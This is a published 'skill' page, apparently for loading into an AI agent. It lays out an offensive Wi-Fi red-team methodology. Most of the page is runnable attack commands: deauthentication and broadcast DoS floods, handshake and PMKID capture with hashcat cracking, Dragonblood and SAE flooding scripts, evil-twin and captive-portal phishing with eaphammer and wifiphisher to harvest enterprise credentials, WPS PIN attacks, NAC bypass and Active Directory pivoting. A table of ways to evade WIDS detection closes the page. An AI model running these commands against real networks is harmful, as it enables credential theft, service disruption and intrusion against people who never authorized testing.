Offensive Wi-Fi Testing

v20260506

offensive-wifi

A wireless 802.11 offensive testing methodology for red team and security assessments. It covers monitor-mode setup, handshake and PMKID capture, WPA3/Enterprise attacks, evil twin setups, WPS abuse, and related wireless intrusion techniques.

Wi-Fi 802 Red Team Wireless Security Handshake Capture PMKID WPA-Enterprise Evil Twin

Get Skill

95 downloads

Overview

Wireless / 802.11 — Offensive Testing Methodology

Quick Workflow

Pick the right adapter (monitor mode + injection + correct band/PHY for target)
Recon airspace passively — never deauth before you know the topology
Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS
Crack offline; do not rely on online dictionary attacks
If WPA-Enterprise, pivot through stolen creds or rogue RADIUS

Hardware & Adapter Selection

Chipset	Strengths	Notes
Atheros AR9271 (Alfa AWUS036NHA)	Solid 2.4 GHz monitor + injection	802.11n only
Realtek RTL8812AU (AWUS036ACH)	Dual-band, injection	Driver: `aircrack-ng/rtl8812au`
MediaTek MT7612U (AWUS036ACM)	Stable dual-band	Modern kernels in-tree
MediaTek MT7921AU	Wi-Fi 6 monitor (limited)	Patched drivers required
AWUS036AXML / AXM	Wi-Fi 6E (6 GHz)	Bleeding edge — verify per release

# Verify monitor + injection
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo aireplay-ng --test wlan0mon
iw list | grep -A 8 "Supported interface modes"

Reconnaissance

# Multi-channel discovery (all bands)
sudo airodump-ng wlan0mon --band abg

# Targeted on a known channel/BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon

# Hidden SSID — wait for client probe or force deauth
sudo airodump-ng -c 6 --essid-regex "." wlan0mon

# Wigle / Kismet for war-driving
kismet -c wlan0mon

Key data to record: BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI.

WPA / WPA2-PSK

Four-way Handshake Capture

# Targeted capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Force a reconnect (deauth one client, do not blanket the AP)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Verify the EAPOL frames are usable:

hcxpcapngtool -o hash.hc22000 handshake-01.cap

PMKID (No Client Required)

PMKID lives in the first AP-to-station message — you can grab it without anyone connected.

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
  --enable_status=1 --filterlist_ap=targets.txt --filtermode=2

hcxpcapngtool -o hash.hc22000 pmkid.pcapng

Cracking

# GPU dictionary attack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule

# Mask attack (e.g. carrier defaults: 10 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators)
upc_keys ESSID | hashcat -m 22000 hash.hc22000 -

WPA3 / SAE

Transition-Mode Downgrade

If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK.

Dragonblood (CVE-2019-9494/9495/13377)

Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) with insufficient curve diversification leaks password elements via timing/cache attacks.

# Reference implementation
git clone https://github.com/vanhoefm/dragonblood
python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon

SAE Auth Flooding (Resource Exhaustion)

sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
# Triggers heavy crypto on AP CPU; can DoS lower-end deployments

WPA-Enterprise (802.1X / EAP)

Method Identification

# Watch initial EAP-Request/Identity to fingerprint method
tshark -i wlan0mon -Y "eapol || eap" -V

Inner Method	Attack
EAP-MSCHAPv2 (PEAP/TTLS)	Crack NetNTLMv1-style challenge offline
EAP-GTC	Cleartext password — capture via rogue RADIUS
EAP-TLS	Steal client cert (often in user keychain / DPAPI / NDES)
EAP-PWD	Dragonblood-class side channels

Evil-Twin RADIUS (MSCHAPv2 / GTC)

# eaphammer — automated rogue AP + RADIUS
eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \
  --auth wpa-eap --creds

# Captured hashes → asleap or hashcat -m 5500
asleap -C challenge -R response -W wordlist.txt

Critical: organizations that don't pin server cert + CN on supplicants are vulnerable. Win10/11 with ServerValidation disabled (common for BYOD) will hand over creds.

EAP-TLS Cert Theft Paths

DPAPI master key + cert blob from user profile (%APPDATA%\Microsoft\SystemCertificates)
NDES misconfig (ESC8-class cert request abuse)
ADCS user auto-enrollment template with weak ACL

WPS

Pixie Dust (Offline)

# Capture WPS exchange
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# Or
bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon

Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable.

Online PIN Brute (Last Resort)

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30
# Most modern APs lock out after a few failures — slow and noisy

Evil Twin / KARMA / Mana

Stock Evil Twin (Captive Portal)

# wifiphisher — automated AP + phishing portal
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd

# airgeddon — interactive menu (good for one-off engagements)
sudo airgeddon

KARMA / Mana (Probe Exploitation)

Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization.

# hostapd-mana
sudo hostapd-mana ./mana.conf

# Combine with rogue RADIUS for enterprise nets
eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \
  --auth wpa-eap --creds --hostile-portal

MAC Randomization Defeat

iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices.

KRACK & FragAttacks

Attack	Class	Target
KRACK (CVE-2017-13077..082)	Key reinstallation	Unpatched WPA2 supplicants
FragAttacks (CVE-2020-24586..588)	Fragmentation/aggregation	Most pre-2021 implementations

Test a network's patch status:

# Vanhoef test scripts
git clone https://github.com/vanhoefm/krackattacks-scripts
./krack-test-client.py
git clone https://github.com/vanhoefm/fragattacks
./test-fragattacks.py wlan0

Deauth / Disassociation Attacks

# Single client deauth (use for handshake capture)
aireplay-ng --deauth 3 -a AP -c CLIENT wlan0mon

# Broadcast (DoS — only with explicit authorization)
mdk4 wlan0mon d -B target_bssids.txt

# Disassoc + auth flood combo (kicks then prevents reconnect)
mdk4 wlan0mon a -a AP_BSSID -m

802.11w (PMF) blocks unencrypted deauth. Most modern enterprise APs require it. Clients without PMF support are still kickable via Action frames.

802.1X / Wired NAC Bypass (Adjacent)

# Sniff valid 802.1X exchange on wired side
tcpdump -i eth0 -w nac.pcap ether proto 0x888e

# silentbridge / nac_bypass — transparently bridge through an authenticated host
git clone https://github.com/s0lst1c3/silentbridge
silentbridge --takeover --phy wlan0  # variants for wired

Wi-Fi 6 / 6E / 7 Considerations

6 GHz (Wi-Fi 6E) disables WPA2-only; WPA3 + PMF mandatory. Many attacks are mitigated by spec.
OFDMA / MU-MIMO: legacy injection often misaligns with RU allocations — verify packet delivery on test bench.
TWT (Target Wake Time): deauth windows differ; observe BA sessions before injecting.
MLO (Wi-Fi 7): a single client over multiple links — capture must cover all links to recover full session.

Sidebands & Adjacent Wireless

Tech	Tool	Notes
Bluetooth Classic	`redfang`, `crackle`, `btproxy`	LMP/L2CAP fuzzing
BLE	`bettercap`, `Sniffle` (TI CC1352), `Frontline`	GATT enumeration, LE Secure Connections downgrade
Zigbee / 802.15.4	`KillerBee`, `apimote`, `ATUSB`	Touchlink commissioning abuse
Z-Wave	`Z-Force`, `EZ-Wave`	S0 key reuse bug class
LoRa / LoRaWAN	`LoRaPWN`, `ChirpStack`	Join-request replay, ABP key reuse
433/868 MHz (Sub-GHz)	HackRF / Flipper Zero	Garage doors, doorbells, telemetry

RADIUS / Backend Pivots Post-Compromise

# If you crack a domain user via PEAP-MSCHAPv2, pivot to AD
nxc smb dc -u captured_user -p cracked_pass --pass-pol

# If RADIUS server is stand-alone (FreeRADIUS), check users file & MOTP secrets
# If on Windows NPS, pivot via the service account context

Engagement Cheatsheet

# 1. Setup
sudo airmon-ng check kill && sudo airmon-ng start wlan0
sudo iw reg set US

# 2. Recon (do not deauth yet)
sudo airodump-ng wlan0mon --band abg --write recon

# 3. PMKID sweep (passive)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# 4. Targeted capture if PMKID empty
sudo airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon &
sudo aireplay-ng --deauth 3 -a <AP> -c <client> wlan0mon

# 5. Crack offline
hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule

# 6. If enterprise → eaphammer evil twin
# 7. Document SSID, BSSID, channel, RSSI, encryption, attack used, time

Detection / Defender View

AP/WIDS Detector	Trigger	Evasion
Excessive deauth	>5 deauth/sec from one source MAC	Spread across spoofed MACs, target individuals
Rogue AP detection	Unauthorized BSSID on monitored channel	Match real BSSID's beacon timing/IE order exactly
Karma response anomaly	AP answering all probe SSIDs	Use Mana mode, pick one plausible SSID
WPS lockout	Repeated PIN failures	Pixie Dust offline only, abandon online brute
RADIUS log: cert mismatch	Supplicant rejects evil-twin cert	Use copies of victim CA-signed certs (unlikely)

Key References

MITRE ATT&CK: T1200 (Hardware Additions), T1557.004 (AiTM via Evil Twin)
IEEE 802.11-2020 (combined spec including KRACK mitigations)
WPA3 Spec / Wi-Fi Alliance: dragonblood.net for vuln tracking
hcxtools / hashcat WPA modes: docs at hashcat.net
Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md

Info

Category Development

Name offensive-wifi

Version v20260506

Size 10.79KB

Source SnailSploit/Claude-Red

Updated At 2026-05-07